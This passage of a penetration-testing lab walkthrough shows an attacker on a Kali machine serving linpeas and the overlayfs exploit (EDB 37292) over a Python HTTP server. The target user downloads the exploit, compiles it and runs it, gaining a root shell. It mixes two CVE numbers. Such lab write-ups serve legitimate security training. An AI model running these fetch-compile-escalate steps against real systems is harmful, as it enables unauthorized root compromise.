drwxr-xr-x 5 kali kali 4096 Dec 31 01:50 target_machine
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Templates
-rw-r----- 1 kali kali 4 Mar 17 20:27 .vboxclient-clipboard.pid
-rw-r----- 1 kali kali 5 Mar 17 20:27 .vboxclient-display-svga-x11.pid
-rw-r----- 1 kali kali 4 Mar 17 20:27 .vboxclient-draganddrop.pid
-rw-r----- 1 kali kali 4 Mar 17 20:27 .vboxclient-seamless.pid
-rw-r----- 1 kali kali 4 Mar 17 20:27 .vboxclient-vmsvga-session-tty7.pid
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Videos
-rw------- 1 kali kali 1988 Dec 10 00:41 .viminfo
drwxr-xr-x 2 kali kali 4096 Nov 13 02:19 vulnOSv2
-rw-r--r-- 1 kali kali 180 Mar 12 04:03 .wget-hsts
-rw------- 1 kali kali 299 Mar 17 21:29 .Xauthority
-rw------- 1 kali kali 8473 Mar 17 21:10 .xsession-errors
-rw------- 1 kali kali 8520 Mar 12 03:50 .xsession-errors.old
-rw------- 1 kali kali 8644 Mar 12 04:46 .zsh_history
-rw-r--r-- 1 kali kali 10877 Aug 8 2022 .zshrc
┌──(root㉿kali)-[/home/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
172.16.3.128 - - [17/Mar/2023 22:42:02] "GET /linpeas.sh HTTP/1.1" 200 -
Move to the tmp folder, which is the one place writing is allowed: (the linpeas output is too long, so it is not pasted)
In short, there is CVE-2015-8660 overlayfs.
Look it up on exploit-db:
See the red circle below; it should closely match the environment of this target machine:
The PoC can be downloaded as shown in the figure below:
It can also be found locally by its EDB-ID:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# searchsploit -m 37292
Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/37292
Path: /usr/share/exploitdb/exploits/linux/local/37292.c
Codes: CVE-2015-1328
Verified: True
File Type: C source, ASCII text, with very long lines (466)
Copied to: /home/kali/PT_day3/37292.c
Likewise start a simple HTTP server in the folder containing the PoC:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Have the target download the source:
jason@Ubuntu14:/tmp$ wget http://192.168.200.7/37292.c
--2022-10-29 21:49:39-- http://192.168.200.7/37292.c
Connecting to 192.168.200.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: ‘37292.c’
100%[======================================================>] 4,968 --.-K/s in 0.008s
2022-10-29 21:49:39 (594 KB/s) - ‘37292.c’ saved [4968/4968]
jason@Ubuntu14:/tmp$ gcc 37292.c -o ofs
jason@Ubuntu14:/tmp$ ls -l
total 984
-rw-rw-r-- 1 jason jason 4968 3月 18 2023 37292.c
-rwxrwxr-x 1 jason jason 776167 4月 17 2022 linpeas.sh
-rw-rw-r-- 1 jason jason 197924 10月 29 21:20 linpeas.txt
-rwxrwxr-x 1 jason jason 13644 10月 29 21:50 ofs
drwx------ 2 apollo apollo 4096 12月 15 2021 ssh-p8kd9p9WZt8t
-rw-rw-r-- 1 apollo apollo 0 12月 15 2021 unity_support_test.1
jason@Ubuntu14:/tmp$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
You can also try scp to pull the file over. The two earlier machines should have the same weakness, but if you copy the ofs binary from 172.16.3.128 straight over, you'll find it doesn't work, because the CPU is different.